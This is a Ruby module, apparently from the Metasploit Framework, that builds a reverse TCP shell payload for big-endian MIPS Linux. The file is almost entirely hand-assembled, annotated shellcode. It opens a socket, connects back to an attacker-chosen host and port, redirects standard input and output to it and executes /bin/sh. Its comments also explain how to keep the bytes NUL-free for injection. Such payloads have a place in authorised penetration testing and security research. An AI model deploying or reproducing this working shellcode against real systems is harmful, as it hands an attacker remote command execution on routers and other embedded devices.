Path: blob/master/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Linux/MIPS (big-endian) reverse TCP shell, inline.
#
# The stub is 46 fixed-width instructions: socket() -> connect(LHOST:LPORT)
# -> dup2() onto fds 2, 1, 0 -> execve("//bin/sh"). LHOST and LPORT are
# patched straight into lui/ori immediates, so the size never changes.
module MetasploitModule
  # 46 instructions * 4 bytes.
  CachedSize = 184

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Command Shell, Reverse TCP Inline',
        'Description' => 'Connect back to attacker and spawn a command shell',
        'Author' => [
          'rigan <imrigan[at]gmail.com>', # Original shellcode
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['EDB', '18226']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSBE,
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::CommandShellUnix,
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )
  end

  # Assembles the big-endian MIPS o32 stub for the configured LHOST/LPORT.
  #
  # @param _opts [Hash] unused; kept for the Msf::Payload::Single contract
  # @return [String] super's output followed by the 184-byte stub, or just
  #   super's output when LHOST is not set
  # @raise [ArgumentError] from Integer() when LPORT is not an integer string
  #
  # Caveats a user of this stub should know:
  # - Every fixed instruction word below is NUL-free (the syscall opcode is
  #   encoded with a non-zero code field for that reason). The only NUL bytes
  #   that can appear come from the LHOST/LPORT immediates themselves, e.g.
  #   port 80 (0x0050) or 10.0.0.1; pick an encoder if the injection vector
  #   is NUL-terminated.
  # - The stores to -1(sp) and -26(sp) are misaligned word stores. MIPS
  #   hardware faults on those, so this relies on the Linux kernel's
  #   user-space unaligned-access emulation (normally enabled) - confirm on
  #   hardened targets.
  # - Scratch data is written below sp without adjusting sp; anything that
  #   pushes onto the stack between the stores and the syscalls (e.g. signal
  #   delivery) could presumably clobber it.
  def generate(_opts = {})
    lhost = datastore['LHOST']
    # No connect-back address: fall back to the framework default instead of
    # patching garbage into the immediates.
    return super if !lhost || lhost.empty?

    # Network byte order, exactly as they must appear inside sockaddr_in.
    lhost_bytes = [Rex::Socket.addr_atoi(lhost)].pack('N')
    lport_bytes = [Integer(datastore['LPORT'])].pack('n')

    # socket(AF_INET, SOCK_STREAM, 0)
    # Small constants go through li/nor or slti so no word contains 0x00.
    # Note that 2 is SOCK_STREAM in the MIPS ABI (SOCK_DGRAM is 1 there).
    sys_socket =
      "\x24\x0f\xff\xfa" + # li   t7,-6
      "\x01\xe0\x78\x27" + # nor  t7,t7,zero      -> t7 = 5
      "\x21\xe4\xff\xfd" + # addi a0,t7,-3        -> domain   = 2 (AF_INET)
      "\x21\xe5\xff\xfd" + # addi a1,t7,-3        -> type     = 2 (SOCK_STREAM on MIPS)
      "\x28\x06\xff\xff" + # slti a2,zero,-1      -> protocol = 0
      "\x24\x02\x10\x57" + # li   v0,4183         -> sys_socket
      "\x01\x01\x01\x0c"   # syscall (0x0101010c: non-zero code field, NUL-free)

    # connect(sockfd, &sockaddr_in, 16)
    # The fd is parked at -1(sp); the sockaddr_in is assembled at -30(sp):
    # sin_family 0x0002, sin_port, sin_addr.
    sys_connect =
      "\xaf\xa2\xff\xff" + # sw   v0,-1(sp)       -> save socket fd (misaligned)
      "\x8f\xa4\xff\xff" + # lw   a0,-1(sp)       -> sockfd
      "\x34\x0f\xff\xfd" + # li   t7,0xfffd
      "\x01\xe0\x78\x27" + # nor  t7,t7,zero      -> 0xffff0002
      "\xaf\xaf\xff\xe0" + # sw   t7,-32(sp)      -> sin_family = 2 lands at -30(sp)
      "\x3c\x0e" + lport_bytes + # lui  t6,LPORT
      "\x35\xce" + lport_bytes + # ori  t6,t6,LPORT
      "\xaf\xae\xff\xe4" + # sw   t6,-28(sp)      -> sin_port
      "\x3c\x0e" + lhost_bytes[0, 2] + # lui  t6,LHOST[0..1]
      "\x35\xce" + lhost_bytes[2, 2] + # ori  t6,t6,LHOST[2..3]
      "\xaf\xae\xff\xe6" + # sw   t6,-26(sp)      -> sin_addr (misaligned)
      "\x27\xa5\xff\xe2" + # addiu a1,sp,-30      -> &sockaddr_in
      "\x24\x0c\xff\xef" + # li   t4,-17
      "\x01\x80\x30\x27" + # nor  a2,t4,zero      -> addrlen = 16
      "\x24\x02\x10\x4a" + # li   v0,4170         -> sys_connect
      "\x01\x01\x01\x0c"   # syscall

    # dup2(sockfd, fd) for fd = 2, 1, 0 so the shell's stdio is the socket.
    # The first execve instruction (slti a2) sits in the bne delay slot; it
    # only zeroes a2, so executing it once per iteration is harmless.
    sys_dup2 =
      "\x24\x11\xff\xfd" + # li   s1,-3
      "\x02\x20\x88\x27" + # nor  s1,s1,zero      -> s1 = 2 (first newfd)
      "\x8f\xa4\xff\xff" + # lw   a0,-1(sp)       -> oldfd = sockfd
      "\x02\x20\x28\x21" + # move a1,s1           <- dup2_loop
      "\x24\x02\x0f\xdf" + # li   v0,4063         -> sys_dup2
      "\x01\x01\x01\x0c" + # syscall
      "\x24\x10\xff\xff" + # li   s0,-1
      "\x22\x31\xff\xff" + # addi s1,s1,-1
      "\x16\x30\xff\xfa"   # bne  s1,s0,dup2_loop  (exits once s1 == -1)

    # execve("//bin/sh", ["//bin/sh", NULL], NULL)
    # The doubled slash pads the path to exactly 8 bytes, so the terminating
    # NUL is a separate `sw zero` rather than a 0x00 inside an immediate.
    sys_execve =
      "\x28\x06\xff\xff" + # slti a2,zero,-1      -> envp = NULL
      "\x3c\x0f\x2f\x2f" + # lui  t7,0x2f2f       "//"
      "\x35\xef\x62\x69" + # ori  t7,t7,0x6269    "bi"
      "\xaf\xaf\xff\xec" + # sw   t7,-20(sp)
      "\x3c\x0e\x6e\x2f" + # lui  t6,0x6e2f       "n/"
      "\x35\xce\x73\x68" + # ori  t6,t6,0x7368    "sh"
      "\xaf\xae\xff\xf0" + # sw   t6,-16(sp)
      "\xaf\xa0\xff\xf4" + # sw   zero,-12(sp)    -> NUL terminator
      "\x27\xa4\xff\xec" + # addiu a0,sp,-20      -> filename
      "\xaf\xa4\xff\xf8" + # sw   a0,-8(sp)       -> argv[0] = filename
      "\xaf\xa0\xff\xfc" + # sw   zero,-4(sp)     -> argv[1] = NULL
      "\x27\xa5\xff\xf8" + # addiu a1,sp,-8       -> argv
      "\x24\x02\x0f\xab" + # li   v0,4011         -> sys_execve
      "\x01\x01\x01\x0c"   # syscall

    super + sys_socket + sys_connect + sys_dup2 + sys_execve
  end
end